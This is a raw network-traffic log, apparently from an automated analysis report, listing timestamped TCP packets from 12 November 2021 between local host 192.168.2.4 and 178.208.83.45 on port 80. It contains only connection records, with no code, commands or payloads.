                          Nov 12, 2021 22:24:23.975052118 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.975125074 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.975164890 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975183010 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975198030 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975213051 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975229025 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975244999 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975259066 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975302935 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975317001 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975354910 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975370884 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975384951 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975398064 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975411892 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975425959 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975440025 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975498915 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975512981 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975528002 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975542068 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975631952 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975649118 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975691080 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975708008 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975723982 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975739002 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:24.014951944 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:24.384676933 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:24.384835958 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:24.800326109 CET8050163178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:24.800436020 CET5016380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:24.926129103 CET5016380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:24.926789999 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:24.929008961 CET5016580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:24.948542118 CET8050163178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:24.948661089 CET5016380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:24.948952913 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:24.949012041 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:24.951169968 CET8050165178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:24.951286077 CET5016580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:24.966933966 CET5016580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:24.989542961 CET8050165178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:24.992595911 CET8050165178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:24.992660999 CET5016580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.176362991 CET5016580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.178014994 CET5016680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.194699049 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.198930979 CET8050165178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.199028015 CET5016580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.200381994 CET8050166178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.200493097 CET5016680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.201198101 CET5016680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.217253923 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.217468023 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.217946053 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.218050957 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.218266010 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.218400955 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.223556995 CET8050166178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.226656914 CET8050166178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.226762056 CET5016680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.240241051 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.240268946 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.240521908 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.240535975 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.240547895 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.240559101 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.240606070 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.240617037 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.240644932 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.240657091 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.240658045 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.240679026 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.240703106 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.240724087 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.240734100 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.240763903 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.240854979 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.240866899 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.262964010 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263014078 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263031960 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263044119 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263066053 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263094902 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.263113022 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263127089 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263134003 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263137102 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.263164043 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.263201952 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.263215065 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263226986 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263278961 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.263323069 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.263386965 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263401031 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263407946 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263416052 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263427973 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263437986 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263449907 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263458967 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263467073 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.263492107 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.263520956 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.263550997 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.263595104 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.285525084 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285552979 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285569906 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285583973 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285593987 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285609961 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285620928 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285630941 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285641909 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285651922 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285651922 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.285662889 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285674095 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285711050 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.285726070 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.285762072 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285765886 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.285782099 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285795927 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285805941 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285820961 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285830975 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285881996 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285897970 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285912037 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285945892 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285962105 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285979033 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.285993099 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.286034107 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.286047935 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.286063910 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.286077976 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.286093950 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.286153078 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.286169052 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.286183119 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.286200047 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.286216021 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.286226034 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.286236048 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.286251068 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.308119059 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.308203936 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.308255911 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.308461905 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.308653116 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.308707952 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.308760881 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.310971022 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.311096907 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.333106995 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.359719992 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.359852076 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.474190950 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.474492073 CET5016680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.475765944 CET5016880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.496588945 CET8050167178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.496665955 CET5016780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.496733904 CET8050166178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.497172117 CET5016680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.497936964 CET8050168178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.498044968 CET5016880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.498806953 CET5016880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.521034956 CET8050168178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.524260044 CET8050168178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.524410009 CET5016880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.630178928 CET5016880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.631793976 CET5016980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.652462959 CET8050168178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.652678967 CET5016880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.654109955 CET8050169178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.654254913 CET5016980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.655658960 CET5016980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.677958965 CET8050169178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.680962086 CET8050169178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.681078911 CET5016980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.813886881 CET5016980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.815824032 CET5017080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.836338997 CET8050169178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.838053942 CET8050170178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.900654078 CET5016980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.900785923 CET5017080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.928795099 CET5017080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:28.951176882 CET8050170178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:28.955473900 CET8050170178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.071316957 CET5017080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.241111994 CET5017080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.243303061 CET5017180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.263525009 CET8050170178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.263606071 CET5017080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.265784025 CET8050171178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.265902042 CET5017180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.266880989 CET5017180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.289356947 CET8050171178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.297665119 CET8050171178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.306667089 CET5017180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.432710886 CET5017180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.436095953 CET5017380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.437021971 CET5017480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.455246925 CET8050171178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.455393076 CET5017180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.458389044 CET8050173178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.459204912 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.459280014 CET5017380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.459292889 CET5017480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.459811926 CET5017480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.459916115 CET5017480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.460105896 CET5017480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.460241079 CET5017480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.461476088 CET5017380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.482386112 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.482410908 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.482604980 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.482625961 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.482644081 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.482691050 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.482709885 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.482748032 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.482764959 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.482779026 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.482795000 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.482814074 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.483803034 CET8050173178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.484323025 CET5017480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.506618023 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506684065 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506701946 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506716967 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506732941 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506773949 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506789923 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506807089 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506822109 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506855965 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506871939 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506934881 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506952047 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506968975 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.506983995 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.507002115 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.507018089 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.507054090 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.507071972 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.508343935 CET5017480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.530769110 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.530797005 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.530807972 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.530819893 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.530833960 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.530849934 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.530864954 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.530879974 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.530895948 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.530910015 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.530939102 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.530955076 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531022072 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531066895 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531085014 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531100035 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531115055 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531147003 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531161070 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531176090 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531192064 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531205893 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531220913 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531270027 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531285048 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531300068 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531315088 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531328917 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531343937 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531390905 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531516075 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531534910 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531549931 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531564951 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.531579971 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.533066988 CET5017480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.534190893 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.534219027 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.534235001 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.556519032 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.556552887 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.556570053 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.556585073 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.556601048 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.556616068 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.556631088 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.556646109 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.556660891 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.556672096 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.556682110 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.556695938 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.558146000 CET8050173178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.558727026 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.567974091 CET5017480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.568094969 CET5017380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.688487053 CET5017480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.690088987 CET5017380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.691085100 CET5017580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.711769104 CET8050174178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.711862087 CET5017480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.712387085 CET8050173178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.712940931 CET5017380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.713326931 CET8050175178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.716499090 CET5017580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.717760086 CET5017580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.741317034 CET8050175178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.834016085 CET8050175178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.838258028 CET5017580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.961792946 CET5017580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.963398933 CET5017680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.984844923 CET8050175178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.985006094 CET5017580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.985685110 CET8050176178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:29.985810995 CET5017680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:29.986485004 CET5017680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.008721113 CET8050176178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:30.094290972 CET8050176178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:30.094507933 CET5017680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.208386898 CET5017680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.210315943 CET5017780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.230806112 CET8050176178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:30.230916977 CET5017680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.233043909 CET8050177178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:30.233186007 CET5017780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.234415054 CET5017780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.257018089 CET8050177178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:30.354269028 CET8050177178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:30.354419947 CET5017780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.476887941 CET5017780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.477569103 CET5017880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.499488115 CET8050177178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:30.499577999 CET5017780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.499835014 CET8050178178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:30.499933004 CET5017880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.500457048 CET5017880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.523319006 CET8050178178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:30.609862089 CET8050178178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:30.609924078 CET5017880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.725554943 CET5017880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.733309984 CET5017980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:30.747982979 CET8050178178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:30.748126030 CET5017880192.168.2.4178.208.83.45
